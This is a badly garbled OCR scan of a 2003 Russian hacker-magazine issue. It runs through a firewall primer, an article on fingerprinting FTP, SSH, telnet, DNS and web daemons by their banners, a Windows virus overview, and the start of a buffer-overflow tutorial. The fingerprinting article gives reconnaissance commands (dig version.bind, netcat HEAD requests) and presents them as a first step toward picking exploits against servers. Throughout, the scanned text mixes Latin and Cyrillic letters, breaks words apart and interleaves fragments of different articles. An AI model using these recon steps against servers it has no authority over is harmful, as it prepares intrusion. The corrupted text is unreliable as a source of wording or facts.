Vint(vint@townnet.ru) 


irewall в дословном переводе 

с буржуйского значит "стена 

огня". В умных книжках и 90- 
ках его еще называют брандмауэром. Стен- 
ка выполняет функции защиты отдельного 
компа или целых сетей от вторжения извне 
или изнутри. 


СТЕНКИ БОЛЬШИЕ И МАЛЕНЬКИЕ 
Фаерволлы бывают аппаратные или прог- 
раммные. Аппаратная огнестенка - это осо- 
бая железяка, которая ставится на входе в 
защищаемую сеть. Аппаратный фаерволл 
никаким образом не связан с компом, то 
есть он имеет отдельное питание и 
собственное ПО. Для защиты крупных се- 
тей обычно стараются поставить именно 
аппаратный брандмауэр, как более надеж- 
ный и устойчивый. Но, как ты сам понима- 
ешь, отдельный девайс стоит отдельных 
баксов, причем сумма обычно немалень- 
кая. Более дешевое решение - програм- 
мные фаерволлы, которые могут быть реа- 
лизованы как в виде отдельного компа, 
так и в виде приложения на компе юзера. 
Если под фаерволл выделяется отдельный 
комп, то на него ставится клон юниха, наст- 
раивается роутинг, маршрутизация, маска- 
радинг и т.9. И фаерволл на отдельном 
компе приближается по своей функцио- 
нальности к аппаратным огнестенкам. 


КАК МЫ РАБОТАЕМ 

Принцип работы стеночки достаточно прост: 
фаерволл фильтрует все входящие и исхо- 
дящие пакеты aka трасрорик и, сверяясь с 
заданными ему правилами, пропускает либо 
отметает их. В зависимости от этого одни 
ресурсы сети или юзера будут доступны 
снаружи, другие - только изнутри, а третьи 
- вообще недоступны. Например, можно от- 
рубить фаерволлом все, кроме почты, и 
юзер внутри сети не сможет качать порну- 
ху, а хацкер снаружи не сможет подтелне- 
титься к главному серваку сетки. Самые на- 
вороченные фаерволлы разбирают пакеты, 
исследуют их вдоль и поперек и могут даже 
анализировать их содержимое. 


ЮЗЕР ОБЫЧНЫЙ, 

СРЕДНЕЙ ПУШИСТОСТИ 

Обычные юзвери, естественно, используют 
программные решения, выполненные на 
уровне отдельного приложения. Такие cocp- 
тины есть под все распространенные ОС. 
Они различаются только фейсом, размером 
да качеством работы. Занимаются они, в ос- 
новном, тем, что прикрывают гостеприимно 
распахнутые порты юзверьской тачки. 
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Схема фаерволлинга в Лине 


Ты, наверное, уже знаешь, что такое пор- 
ты. Если нет, то грубо - это представитель 
софтины, запущенной на твоей машине, 
ожидающий соединения с какой-нибудь gpy- 
гой сосфтиной. То есть если ты запускаешь 
експлорер, то на твоей тачке открывается 
80-й порт, и все данные с WWW по протоко- 
лу НТТР идут тебе через этот порт. Портов 
на твоей тачке может быть открыто множе- 
ство, и обычно они документированы; так 
25-й - SMTP (мессаги отправляешь), 80-й - 
НТТР(Инет глядишь), 139-й - нетбиос (сосе- 
дей по локале имеешь) и т.д. Трояны тоже 
открывают свои порты, только ты об этом не 
знаешь :). Так вот, именно порты являются 
частой проблемой для тех, кто любит поси- 
деть в ирке или посерсфрить Инет без защиты 
- скажешь где-нибудь чего-нибудь нехоро- 
шее, и бац: порты засраны, сам ты нюкнут! 
Вот от таких случаев и спасает юзера огнен- 
ная стенка - она не позволит зафлудить 
уязвимые порты, не даст злому трояну 90- 
нести на тебя, прикроет от нюков. Если, ко- 
нечно, ты ее грамотно настроил или хотя бы 
не сбил дефолтные настройки, которые для 
тебя умные люди намутили. 

Фаерволл, естественно, гуд, но и он не иде- 
ален и не может обеспечить полной безопас- 
ности. Фишка вот в чем: соединения, которые 
вам нужны для работы (например, web, мыло 
ит.9.), фаерволл обязан оставлять открыты- 
ми. Из-за багов в самих ОС и в программах, 
работающих по открытым соединениям, на 
твоем компе или в сети могут возникать уяз- 
вимости, которые потенциально дают воз- 


MOMHOCTb посторонними проникнуть в сеть 


извне. Это значит, что некий Вася-ха- 
кер, скачав последний Xspider, может 
найти кучу дыр и поиметь тебя. Так, 
Хр аег версии 6.5 находит в ХРеновой 
Виноде (с поставленным IIS 5.1, но без 
сервис пака) более 15 уязвимостей! Но 
фаерволл все равно необходим уже 
хотя бы по той причине, что он может 
детектить такое сканирование и при 
грамотной настройке обрубить. 


СТЕНКА ДЛЯ ВИНДЫ 

К несчастью для вынь-юзеров о 
встроенном в Винды сфаерволле гово- 
рить еще рано. Есть зачатки, но уж 
больно они убоги, чтобы восприни- 
мать их более-менее серьезно :). По 
этой причине рассмотрим фаерволлы 
в Выне на примере лучшего, по мне- 
нию многих, фаерволла - Agnitum 
Outpost Firewall. Основное отличие от 
других программ заключается в отк- 
рытой архитектуре, позволяющей 
увеличивать функциональность прог- 
раммы за счет использования плаги- 
нов. Таким образом, множество прият- 
ных мелочей можно доставить уже 


То есть в данной софтине очень хо- 
рошо сочетается простой и ясный 
фейс с мощным механизмом защиты и 
фрильтровки пакетов, кроме того Аут- 
пост экономит традфф, обрезая рекла- 
му. Но, как ты сам видишь, этот фаер- 
BONN именно персональный, не Npeg- 
назначен для защиты сети и не умеет 
анализировать содержание пакетов. 


ПРАВИЛЬНОЙ OC - 
ПРАВИЛЬНЫЙ ФАЕРВОЛЛ! 

Ты уже понял, что фаерволлы в 
Bunge, как и все остальное, реализо- 
ваны в виде отдельной софтины 
(пусть даже и хорошей), которая отве- 
чает за безопасный коннект. В этом 
сразу видна уязвимость: прибил cpa- 
ервольный процесс, и писюк лишился 
защиты! В то же время у правильной 
ОС это все реализовано гораздо бо- 
лее грамотно: у линуха - встроенный 
фаерволл, причем это не софтина и 
даже не отдельный модуль! Функции 
qpaepsonna в *nix осях возложены на 
ядро, которое само фильтрует пакеты 
и запросы! Для этого ядро использует 


Фаерволл в правильной оси встроен в 
ядро, поэтому все пакеты проверяются на 
системном уровне 


после установки. Продолжу грузить 
гудом: кэширование ДНС, ограниче- 
ния Cookies, ActiveX. Программа умеет 
создавать для каждого сетевого при- 
ложения свои собственные правила 
обработки и ставить ограничения на 
использование трафорика. Есть nog- 
держка русского языка, причем доста- 
точно неплохая. Имеется возмож- 
ность фильтровать странички по клю- 
чевым словам, то есть ты можешь 
запретить домашним лить из Инета 
порнуху, оставив это право только за 
собой. Также эта софтина может пол- 
ностью скрывать твой комп в сети - 
будет поглощать все внешние запро- 
сы и не выпускать внутренние. Очень 
просто ставится и настраивается. Этот 
фаерволл не просто хорошо защища- 
ет порты, но с помощью плагинов, ко- 
торые, кстати, входят в поставку, мо- 
жет обрезать баннеры, убирать рекла- 
му. И еще одна хорошая срича - обна- 
ружение атак на твой комп. Аутпост 
может определять сканирование пор- 
тов и блокировать атакующего (зап- 


ретить отвечать на все запросы с его 
айпишника или подсети). 


определенные правила, задаваемые 
пользователем в специальном файле 
настройки стеночки. 

Стандартный фаерволл Линукса 
может гораздо больше любого вин- 
дозовского защитника: куча настро- 
ек для отдельных машин, айпишни- 
ков, сетей, ресурсов, настройка опти- 
мального маршрута, кэширование и 
еще гарантированная защита от Пин- 
га Смерти (DeathPing), от Teardrop и 
Bonk (они характерней для МТ, но кто 
знает...), фильтрация фрагментиро- 
ванных бомб, возможность настро- 
ить защиту от IP спуфинга. И самое 
главное - не забудь, что реализация 
защиты происходит на уровне систе- 
мы, а значит так просто блокировать 
защиту не получится. 

Да, настроить никсовый фаерволл 
не так просто, как виндовый, - придет- 
ся писать цепочки правил ручками (и 
это по-нашему!) но правильная ось 
становится все более дружественной 
к юзеру, и юзают ее не только боро- 
датые дядьки (и тетьки :)), но и обыч- 
ные смертные, которые хотят делать 
все мышкой. Вот для таких существ и 
были придуманы графические наст- 
ройщики cpaepBonnos. Конечно, наст- 
роек минимум, но самое необходимое 
есть! Так, ты можешь запретить все 
порты, кроме мыла, ftp, www и аськи. 
А захочешь более тонкого ковыряния 
- http://linux.ru/docs/russian/IPchains 
и www.linuxcenter.ru ждут тебя! Но 
сперва как следует изучи доки, а то 
такого можешь в настройках наму- 
тить, что останешься без Инета, и при 
этом тебя будет достать проще, чем в 
98-х окнах! Да, и не забудь поставить 


ядрышко поновее, например, 2.4.х 
(2.6.0 пока еще не объявлено :)). 


СХЕМА ОГНЯ 

На схемке показан принцип работы 
бфаервольного механизма в Линухе. 
Описываю каждою цепочку: 

Контрольная сумма (Checksum) про- 
веряет, чтоб пакет был целым. Если 
контрольная сумма не совпадает, то 
пакет отбрасывается (DENY). 

Здравомыслие (Sanity) - здесь про- 
веряется формат пакета. Если попал- 
ся пакет с неправильным форматом, 
событие запишется в пог как ненор- 
мальная ситуация. 

Цепочка input - это первая firewall це- 
почка, проверяющая пакет. Если це- 
почка не приняла решение об уничто- 
жении (DENY) или отклонении 
(REJECT) пакета, пакет идет дальше. 

Демаскарадинг (Demasquerade) - 
если пакет является ответом на за- 
маскараденный пакет, он демаскара- 
дируется и перебрасывается прямо 
на цепочку output. 

Решение о маршрутизации. Поле ag- 
реса назначения исследуется кодом 
маршрутизации, чтобы решить, нап- 
равлен ли этот пакет локальному про- 
цессу или послан удаленной машине. 

Локальный процесс - процесс, вы- 
полняющийся на машине. Может по- 
Лучать пакеты после шага "Решение 
о маршрутизации" и может отправ- 
лять пакеты (которые проходят шаг 
"Решения о маршрутизации" и затем 
пересекают цепочку output). 

Интерфейс lo: если пакеты из ло- 
кального процесса предназначены 
локальному процессу, они пройдут 
цепочку output с интерфейсом, уста- 
новленным в "lO", и возвратятся че- 
рез входную цепочку с интерфейсом 
тоже "lo". Интерфейс © обычно на- 
зывается петлевым интерфейсом 
(loopback). 

Локальный (local) - если пакет He 
был создан локальным процессом, то 
цепочка forward проверяет его, иначе 
пакет идет на цепочку output. 

Цепочка forward: эту цепочку про- 
ходят любые пакеты, которые пыта- 
ются уйти на другую машину. 

Цепочка output - эта цепочка про- 
веряет все пакеты, прежде чем вы- 
пустить их наружу. 

На этих нотках и откланиваюсь - ос- 
новные понятия дал, а теперь самому 
пора к компу строить свою оборону. 
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Хорошая дока 
по фаерволлу 
в никсах: 
http://www.rust 
corp.com/linux/ 
ipchains 


Фаерволл в 
Bunge - это от- 
дельное прило- 
жение, которое 

в любой мо- 

мент может 

быть закрыто 
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ОЗы 4hack 


В шапке SSHD 
указаны две 
независимые 
версии. Пер- 
вая - версия 
протокола 
SSH, вторая - 
пакета 
OpenSSH 


Докучаев Дмитрий 
aka Forb (forb@real.xakep.ru) 


бычно сервис опреде- 

ляется без проблем. 

Существует такое по- 
нятие, как баннер или заголовок де- 
мона. Его наличие актуально для 
всех текстовых протоколов. Разде- 
рем пример: цепляемся телнетом на 
25-й порт какой-нибудь тачки и в от- 
вет получаем приглашение от серви- 
са, как правило, содержащее версию 
сендмыла. Но эта статья была бы не- 
актуальна, если все было бы так 
просто. Нередко баннеры умышлен- 
но заменяются (этакая защита про- 
тив хакеров со стороны злых адми- 
нов), а в бинарных протоколах бан- 
неры вообще отсутствуют. Поэтому 
слушай сюда: сейчас мы будем опре- 
делять версию различных сервисов 
всеми возможными способами. 


FTPD - ОПРЕДЕЛЯЕМ И ЛОМАЕМ 
Итак, движемся по возрастанию. 
Стукнемся в самый маленький, но 
важный 21-й порт. Согласно неписа- 
ному закону, за этим портом скры- 
вается демон ЕТР. Определение его 
производителя и версии для нас 
является необходимой задачей. 
Возьмем произвольный хост и 
прицепимся к нему телнетом. В ито- 


ге получим что-то вроде: 


root@shell root]# telnet fw.ru 21 
rying 212.92.96.34... 
nnected to fw.ru. 


о 


го > п © — 
т 


.6.2(1) вт 21 май 2002 15:51:03 MSD) ready. 


Подавляющее большинство ag- 
минов не заменяет баннеры своих 
служб, оставляя все по дефолту. 
Мы видим, что на сервере установ- 
лен дырявый wu-ftpd ;). Причем 
нам дана исчерпывающая инфор- 
мация по его версии и времени 
создания. Дальнейшим шагом ха- 
кера будет определение поддерж- 
ки анонимного входа и поиска 
эксплойта. Не будем заострять на 
этом внимание, ибо наша задача 
была достигнута, а других целей 
мы не преследовали. 


me 


= 
Lie Le 07(32) 2003 


УЗНАЙ BEMOHA! 


УДАЛЕННОЕ ОПРЕДЕЛЕНИЕ 
ВЕРСИИ СЕРВИСОВ 


Для каждого FtpD - свои тонкости 


Я рассмотрел тривиальную задачу. 
А что если админ позаботился о сво- 
ей системе и заменил баннер на про- 
извольный, чтобы запутать хакера? 
В этом случае приветствие сервиса 
нам ничего правдивого не скажет. 

Не отчаивайся, у нас есть свои 
методики для определения дыря- 
вых демонов =). К примеру, диалог 
Wu-Ftpd несколько отличается OT 
ProFTPD. При попытке залогинить- 
ся под anonymous'om wu-ftpd выда- 
ет инфу о правильности е-тай ад- 
реса, тем самым выдавая себя. 


Два разных заголовка OpenSSH 


шинства ЕТРО'шников) пишет 
Anonymous login ok, тем самым выда- 
вая себя с потрохами. Немного тер- 
пения и наблюдательности, и ты 
всегда сможешь определить версию 
FTPD за несколько секунд. 


SSHD КАК НА ЛАДОНИ 
Следующим по счету идет сервис 
SSHD. Он обосновался на 22-м 
порту со своего рождения ;). Сог- 
ласно стандарту RFC, обмен между 
сервером и клиентом Ssh начина- 
ется обоюдным обменом версий. 
Сперва демон показывает завет- 
ный баннер, а клиент отдает ему 


Нередко баннеры умышленно заменяются 
(этакая защита против хакеров со стороны 
злых админов), а в случае бинарных 
протоколов баннеры вообще отсутствуют 


Вообще, полезно знать фразы, ко- 
торые характерны лишь для опреде- 
ленного сервиса. Виндовый Serv-U 
всегда ставит восклицательный знак 
после слова Goodbye, а ProFTPD 
вместо Guest login ok (такая запись 
характерна для подавляющего боль- 


Dig - оружие массового детектирования! 


свой version. Вроде бы все просто, 
и комментарии тут ни к чему. Но 
большинство людей не могут (или 
не умеют) определить версию 
SSHD по его баннеру. Что тут ска- 
зать, не умеешь - научим, не хо- 
чешь - заставим ;). 


Разные баннеры для разных осей 


Цепляемся к 22-му порту произ- 
вольного сервера. При удачном вы- 
боре жертвы мы увидим баннер 
$$Н-1.99-Ореп$5$Н_3.6.1р1. 

Разберем, что к чему. В шапке 
SSHD указаны две независимых 
версии. Первая - версия протокола 
SSH (в нашем случае 1.99), вторая - 
пакета OpenSSH: 3.6.1р1 (самый све- 
жий релиз на сегодняшний день). 

После определения типа демона 
хакер ищет эксплойт для своих 
грязных целей, а именно для взло- 
ма секурного демона (на этот день 
существует единственный рабочий 
эксплойт х2 для переполнения бу- 
фера в SSHD). 

Нередко по баннеру SSHD можно 
определить и операционку. Это ха- 
рактерно для FreeBSD при наличии 
дефолтового сервиса. Такое приг- 
лашение имеет Bug: SSH-1.99- 
OpenSSH_2.3.0 FreeBSD localisa- 
tions 20010713. 


СТАРЫЙ ДОБРЫЙ TELNETD 
Идем дальше. Если ты учился в школе 
и закончил все три класса, то, навер- 
ное, догадался - следующим сервисом 
будет Telnetd, который висит на 23-м 
порту. Если админ поставил Hesacpa- 
ерволенный телнет-демон на свою ма- 
шину, то, скорей всего, о замене его 
баннера он даже не думал, так как пе- 
редача данных через этот сервис не 
подлежит криптованию и может быть 
заснифана ушастым ламером из сег- 
мента. По шапке телнет-демона его 
версию определить довольно пробле- 
матично, а вот тип операционки мож- 
но задетектить без особого труда. На 
самом деле, определение операцион- 
ки для хакера равносильно определе- 
нию версии демона, ибо эксплойты 
универсальны практически для всех 
семейств Telnetd ;). После определе- 
ния OS хакер ищет подходящий плойт 
и успешно применяет его (таких мно- 
го: 7350telnet gna SunO$§, telnetd.c gna 
FreeBSD, пару-тройку сплойтов для 
RedHat и T.g. и т.п.). 


NAMED 

Если в текстовых протоколах onpe- 
деление сервиса сводится к паре 
комано, то в случае бинарного про- 
токола все несколько сложнее. Тот 


ВТЕМ/УЗНАЙ ДЕМОНА! 


же Named, который висит на 53-м 
порту, не скажет тебе ни слова при 
попытке подцепиться к нему. Не- 
мудрено, бинарный обмен данными 
не подразумевает обмен текстовой 
информацией. 

На самом деле существуют тулзы, 
которые помогут тебе задетектить 
релиз named'a. Это даже не хацке- 
рские проги, которые ты можешь 
найти лишь на соответствующих 
сайтах, а вполне мирные тулзенки. 
Одна из них - известный dig (тулза 
для работы с пз-серваками). Она 
имеет кучу параметров, копаться в 
которых тебе, конечно же, некогда. 

Нас интересует всего одна опция 
version.bind, которая поможет тебе 
удаленно определить версию ns- 
сервера. Таким образом, строчка: 


dig @ns.server.ru chaos txt version.bind | 
grep VERSION.BIND 


покажет тебе версию namedia, ус- 
тановленную на серваке 
п5.зегуег.ги. Поставленная задача 
выполнена, дальнейшие действия 
взломщика нас не интересуют. 


РАДОСТИ WEB'A 

Определение версии веб-сервера 
никогда не было сложной задачей. 
Для этого нужно всего-навсего 
послать HEAD-3anpoc, и Апач (а их 
подавляющее и интересующее нас 
большинство) с радостью скажет 
нам свою версию. Вдобавок нам бу- 
дут известны все его модули, ac 
помощью этой инфы хакер точно 
будет знать, какой эксплойт поло- 
мает удаленный сервант. 

Для автоматизации процесса лучше 
всего использовать тулзу netcat от 
Astake. Ты наверняка уже слышал о 
ней (а если нет, бегом сливай сей про- 
ект по адресу 
http://www.atstake.com/research/too 
Is/ncil0.tgz). NetCat умеет снимать 
баннеры с сервисов, поэтому, интегри- 
руя эту возможность с сетевыми пото- 
ками, мы сможем без особого труда 
определить версию веб-сервера. 

Для достижения цели создаем 
файл get.txt, в котором будет нахо- 
диться запрос Www-saronoBka 
(HEAD / НТТРЛ.О и два символа пе- 
ревода строки), и связываем его с 
бинарником netcat командой 


nc -vv www.server.ru 80 < /get.txt |grep Server. 


В итоге получаем исчерпываю- 
щую инфу о версии демона. Как 
правило, none Server имеет Bug: 


Определяем версию httpd и ero модулей 


Server: Apache/1.3.19 (Unix) mod_perl/1.24_01 
mod_throttle/2.11 PHP/4.0.6 
FrontPage/4.0.4.3 mod_ssl/2.8.3 
OpenSSL/0.9.6b mod_gzip/1.3.19.1a. 


Нетрудно заметить, что модуль 
РНР уязвим, и сервер может быть 
взломан с помощью соответствую- 
щего эксплойта. Теперь ты понима- 
ешь, какую важную инфу может 
дать хакеру версия сервера и его 
модулей? 

Впрочем, можно легко обойтись и 
без netcat, заменив его обычным tel- 
net'om, но для перебора целого диа- 
пазона адресов с целью дознания 
версий httpd - netcat незаменим. 


ВСЕМ СПАСИБО, 

ВСЕ СВОБОДНЫ! 

Вот, собственно, и вся информация 
о способах ручного детектирования 
версий демонов. Ты можешь вос- 
пользоваться различными сканера- 
ми и тем самым узнать (или не уз- 
нать) удаленный сервис. Но ручное 
определение засечь гораздо слож- 
нее, чем тупой перебор всех портов 
со стороны сканера. Поэтому, если 
ты в совершенстве будешь владеть 
вышеизложенными методами, твоя 
безопасность будет стопроцентной. 
Поэтому набивай руку и тренируйся, 
и совсем скоро ты будешь узнавать 
любой демон по первому баннеру ;). 
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ВТЕМ/СВОДКИ С ЗАРАЗНОГО ФРОНТА 


ОЗы 4hack 


Кстати, всегда 
свежий рей- 
тинг вирусов с 
подробнейши- 
ми описаниями 
всех вирусов 
ты можешь 
прочитать на 
сайте Каспе- 
рского: 
www.viruslist.ru 
или Panda 
Software: 
http://www.vir 
uslab.ru/?page 
=virus.php&go 
=ratingarchiv 


Сводки 
С ЗАРАЗНОГО ФРОНТА 


ВИРУСЫ В ВЫНЬ 


ЗУ\У1Е 5P1K3 (fallout@pisem.net) 


стория вирусов начи- 
нается с далекого 1984 
года, правда, тогда это 
было все скорее только на бумаге. 
Да и к нашему любимому продукту 
МелкоСосрта это не имеет практичес- 
ки никакого отношения. Перейдем в 
1995 год - время появления ОСи 
Win95 - тогда то и стали появляться 
первые вири отдаленно напоминаю- 
щие нынешние. Если задуматься, то 
можно сказать, что программеры MS 
сделали очень много для распрост- 
ранения вирусов :), начиная от мно- 
гочисленных дыр, заканчивая неко- 
торыми сомнительными принципами 
функционирования системы. Да и 
повсеместная распространенность 
сыграла свою решающую роль. 


ПРИНЦИП ДЕЙСТВИЯ 

Все вири можно разделить на нес- 
колько категорий по принципу их 
действия и алгоритму работы. 

Самые распространенные ранее 
вири - файловые вирусы. Файло- 
вые вири инфицируют исполняе- 
мые сфайлы (.exe/.com), дрова (.sys) 
или библиотеки (.4!), влезая в их 
код. Механизм внедрения различа- 
ется: вирус может вставлять свой 
код в начало, середину или конец 
файла, дробиться на части, внед- 
ряться, не изменяя конечную длину 
файла, разрушать или сохранять 
файлу жизнь. При запуске зара- 
женного файла сначала запускает- 
ся сам вирус, а потом управление 
передается инфицированной прог- 
рамме. При загрузке вируса, он час- 
то записывает себя в оперативную 
память и инфицируют все запускае- 
мые в это время приложения. 

Также существуют загрузочные 
вирусы. Эти вири загружаются еще 
go начала загрузки оси. Для этого 
они перед этим обычно прописыва- 
ют свой запуск в BR (boot record), а 
затем при загрузке операционной 
системы перебираются в оператив- 
ную память. 

Макровирусы появились с появле- 
нием первого MS офиса. Написаны 
они на языке Visual Basic (любимом 
языке Билли) for Applications. Мак- 
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Порносайты - главный источник троев на машинах юзверей. 


ровирусы распространяются вместе 
с документами и для запуска виря 
достаточно открыть документ. 

В последнее время самыми расп- 
ространенными видами вирусов 
стали почтовые черви (вири, расп- 
ространяющиеся по сети). Назначе- 
ние у червей может быть любым: от 
сбора информации, до убийства 
всего, что попадется под руку. 

У вирусов существуют опреде- 
ленные алгоритмы работы. Для 
затруднения прямого поиска анти- 
вирусами своего присутствия, неко- 
торые вири шифруют свой код 
каждый раз новым ключом и новым 
алгоритмом шифрования при зара- 
жении очередной программы. Су- 
ществуют вирусы, которые могут 
полностью изменять свой код, та- 


ной памяти. Такой подход сущест- 
венно осложняет поиск вируса. Не- 
которые вири используют резидент- 
ный модуль, который постоянно сле- 
дит за действиями системы и при 
загрузке зараженного файла стира- 
ет зараженный участок, а потом 90- 
писывает снова (это стелс-вири). 


МЕХАНИЗМ РАСПРОСТРАНЕНИЯ 
Раньше вири чаще всего распрост- 
ранялись через инфицированные 
исполняемые файлы (.ехе, .сот). 
Требовалось, чтобы юзер сам под- 
писал себе смертный приговор, за- 
пустив больную прогу. Но этот ме- 
тод порой рулит и сегодня. 
Размножение червей по почте че- 
рез адресную книгу зараженного 
компа стало на сегодня стандартом. 


Недавно появились несколько 
модификаций червей зараженных 
Win95.CIH'omM, причем зараженных, скорее 
всего, не специально :) 


кие называют полиморфными. 
Также существуют резидентные 
(TSR) вирусы, которые стараются не 
хранить своих файлов на диске, а 
постоянно находиться в оператив- 


Иногда для рассылки писем со сво- 
ей копией вирь использует 
собственный 5МТР-механизм, дела- 
ющий его независимым от установ- 
ленного на компе софта. 


Алярма! Макросы! 


Распространение вирей через 
загрузочные секторы дискет или 
дисков уже давно себя изжило. Ре- 
же стали появляться макровирусы. 
Зато, все чаще встречаются вири 
которые пытаются расползаться 
через непривычные для них среды. 
Например, ICQ, P2P сети, чаты IRC. 

Чуть ли не половина всех вирусных 
заражений происходит через дыры в 
сосфте. Пальма первенства в отноше- 
нии количества уязвимостей, бес- 
спорно, за МикроСосфртом. Самые ды- 
рявые продукты это: аутглюк, ослик IE 
и ворд. Выход из положения - перехо- 
дить на альтернативные проги от 
прочих разработчиков (хотя недавно 
появилось несколько вирей размно- 
жающихся через TheBAT ;(, дыры 
везде есть) или скачивать каждый 
день новые заплатки :). Также множе- 
ство уязвимостей, юзаемых вируса- 
ми, лежит в ICQ и реег2реег клиентах 
(KaZaa, Edonkey). Но куда опаснее 
дыры в серверном ПО от MS (вспом- 
нить хотя бы эпидемии с вирем 
CodeRed или Nimda и Microsoft IIS). 


ПРОТИВОСТОЯНИЕ 

Вот и вечное противостояние виру- 
сов и антивирусов, добра и зла 
(смотря с какой стороны посмотреть 
:). Вирям становится все сложнее и 
сложнее пробиться через наворо- 
ченную оборону антивируса. В день 
появляется с десяток новых виру- 
сов, апдейты к антивирусам всеми 
силами пытаются за ними успеть, 
выходя по несколько раз в день. Ан- 
тивирус представляет сейчас уже 
навороченный комплекс, состоящий 
из нескольких модулей: сканер - тес- 
тит файлы на наличие в них вирусов 
из базы; эвристический (ну и слово 
:) анализатор (часть сканера) - пыта- 
ется эмулировать работу оси и за- 
пуск в ней подозрительного файла, 
по действиям файла делает вывод: 
вирь или не вирь, монитор - постоян- 
но висит в памяти и следит за каж- 
дым новым появившимся файлом; 
поведенческий блокиратор - смотрит 
за прогой, не делает ли она запре- 


Мега топ за 2002 год по версии 
Касперского. 


Вопросы по вирям. 


щенных действий; ревизор диска - 
сохраняет сведения о состоянии 
всех файлов и при перезагрузках 
смотрит не поменялось ли чего и 
инспектор почты. Ну как, отпало же- 
лание писать вирусы :))? На самом 
деле не все так плохо. Антивирусу 
очень сложно определить является 
ли на самом деле программа виру- 
сом, если ее нет в базе. Тут часто 
бывают проколы, когда безобидную 
прогу принимают за злостный вирь 
и наоборот. Плюс, многие юзеры 
часто выгружают антивирус из памя- 
ти, чтобы не жрал ресурсов, да и об- 
новления не все регулярно качают. 


СЕГОДНЯ 
Современные вирусы сильно отли- 
чаются от прошлых. Форматиро- 
вать винт и обнулять FlashBlOS это 
уже не модно :), но встречаются и 
исключения. Частенько вири стали 
снабжать функциями трояна (от- 
сылка паролей, документов и про- 
чей личной инфы на указанный ад- 
рес) и клавиатурного шпиона, быва- 
ет, что личные сведения юзера 
червь выкладывает ради прикола 
для общего пользования :). Бывает, 
червяк, обжившись на винте, сли- 
вает из сети какой-нибудь другой 
убойный вирус, ну и запускает его. 
Грустно говорить, но, все-таки, уро- 
вень вирусописателей в последнее 
время резко падает. Таких вирусов 
как ВыньЧИХ уже давно не пишут. 


Часто просто берут фрагменты его 
кода и заполняют им проблемные 
места. Была не так давно забавная 
история с вирем Annakournikova, ко- 
торый напахал в сети немало. Как 
оказалось, его автором оказался не- 
кий голландский студент под ником 
OnTheFly, который и кодить даже не 
умел. Про специальные прожки, ко- 
торые почти полностью автоматизи- 
руют процесс создания вируса, ты, 
наверное, не раз слышал. Как гово- 
рится, вирус теперь может написать 
каждая домохозяйка :-Р. 

Посмотрим топ 20 вирусов за пос- 
ледний месяц (на момент написа- 
ния материала). Первые две строч- 
ки уже более года стабильно зани- 
мают два червя: I-Worm.Klez и |- 
Worm.Lentin (за каждым около 
20% всех заражений). Остальные 
вири берут на себя меньше про- 
цента от всех случаев. В двадцатку 
также попадают еще 4 червяка 
(Ganda, LovGate, Tanatos и $09), 2 
макровируса (Thus и VMPS-based), 1 
скрипт (VBS.Redlof) и... Win95.CIH, 
который появился в 1999 году, go 
сих пор в топе на 5 месте! 

Про ВинЧИХ хочется рассказать 
отдельно. Недавно появились нес- 
колько модификаций червей зара- 
женный Win95.CIH'om, причем зара- 
женных, скорее всего, не специаль- 
но :). Итого в этой заразе сочетается 
мобильность и легкость в распрост- 
ранении червя и вся мощь и убой- 
ность Чернобыльского виря (так как 
работоспособность проги он не на- 
рушает, а записывает свой код в не- 
используемые участки проги). В 
принципе, то же самое может быть и 
с другими вирусами, не разрушаю- 
щими зараженную прогу (червя). 

Надеюсь, эта инфа поможет тебе 
избежать некоторых неприятнос- 
тей. Как говорится, и на старуху 
бывает проруха :). 


Новости из мира вирусов. 
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Довольно много 
инфы по вирям 
можно почитать 
в вопросах 

и ответах на 
soobcha.ru/faq/ 
index.html? 
topic=1 


Толковую буку 
по вирям ("Ви- 
русная энцикло- 
педия Касперско- 
ro") листай в он- 
лайне на сайте 
http://www.virus 
list.com/virus- 
list.html 
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СТЕК 2, ПЕРЕЗАГРУЗКА 


ЧТО ТАКОЕ BUFFER OVERFLOW 
И КАК ЭТО ЮЗАТЬ? 


Alex Shark (qqqqqwww@e-mail.ru, 
http://nevod.nm.ru) 


В языках вы- 
сокого уровня 
стек напря- 
мую не ис- 
пользуется. 


Главное - пе- 
резаписать 
адрес возвра- 
та и помес- 
тить его в 
начало шелл- 
кода. 


итатель берет зеленое 
колесо и проваливает- 
ся в канализацию... 


ЧТО ТАКОЕ СТЕК 

Тем, кто знаком с понятием стека, 
можно пропустить этот абзац. 
Представь, ты попал в мир Велико- 
го Дани. Ты сидишь в школьном 
классе, у всех на партах стоят те- 
лефоны, но рты у всех заклеены 
скотчем. Есть бумага и ручки, пере- 
давать листики запрещено, потому 
что можно ненароком оторвать ру- 
ку или ногу товарищу. Есть глав- 
ный перец, его зовут Ядро. Есть 
кедр, который умеет складывать 
числа. И еще один умеет их умно- 
жать. Agpy приспичило посчитать 
формулу 2*3+10. Он берет три 
листка, пишет на первом - 2, на 
втором - 3, на третьем - свой теле- 
фон. Кладет это все на стол (это и 
есть стек), звонит Умножителю. 
Тот берет эти листики, рвет и кла- 
дет листок с цифрой 6. После чего 
перезванивает Ядру. Тот доклады- 
вает в кучу листок с числом 10 и 
опять листок с телефоном Ядра. 
Звонит Складывателю. Тот вытас- 
кивает три листика, рвет и кладет 
листок с числом 16, после чего пе- 
резванивает Ядру. Все, Ядро дово- 
лен и сияет. 

Конечно, для простых арифмети- 
ческих действий существует про- 
цессор, а для сложных - математи- 
ческий сопроцессор. Поэтому дан- 
ный пример сильно утрирован. Но 
принцип действия, я думаю, тебе 
ясен. Стек есть то место в памяти, 
куда заносятся данные для пере- 
дачи в другую функцию. Все 
функции имеют входные и выход- 
ные данные. В языках высокого 
уровня стек напрямую не исполь- 
зуется. Но при компиляции проги 
без него не обойтись. Для работы 
со стеком есть только две основ- 
ные функции: положить и выта- 
щить. Для обслуживания всей ра- 
боты нужно только два регистра 
процессора. Первый - указывает 
на «вершину» стека (в зависимос- 
ти от процессора, может вообще 
отсутствовать). Второй - на насто- 
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ящее положение последней запи- 
си. То есть когда мы кладем чис- 
ло, положение стека удаляется от 
вершины. Когда вытаскиваем - 
приближается. Стек может расти 
как вверх по адресам памяти 
(крайне редко), так и вниз. Кроме 
того, существует несколько раз- 
ных организаций стека. 


ПОСЛЕДНИЙ, НА ВЫХОД! 
Наиболее распространенный вид 
стека - это LIFO (Last In First Out, 


Организация стека LIFO в памяти 


последним пришел - первым ушел). 
Если сравнить с пистками, то кладут 
листки друг на друга, а берут начи- 
ная с верхнего. Если взять послед- 
ний листик и попытаться еще раз 
вытащить данные, то происходит 
исчерпание стека. То есть вершина 
и позиция не могут проходить друг 
сквозь друга. Есть еще вид стека 
FIFO, похожий на конвейер. Такой 
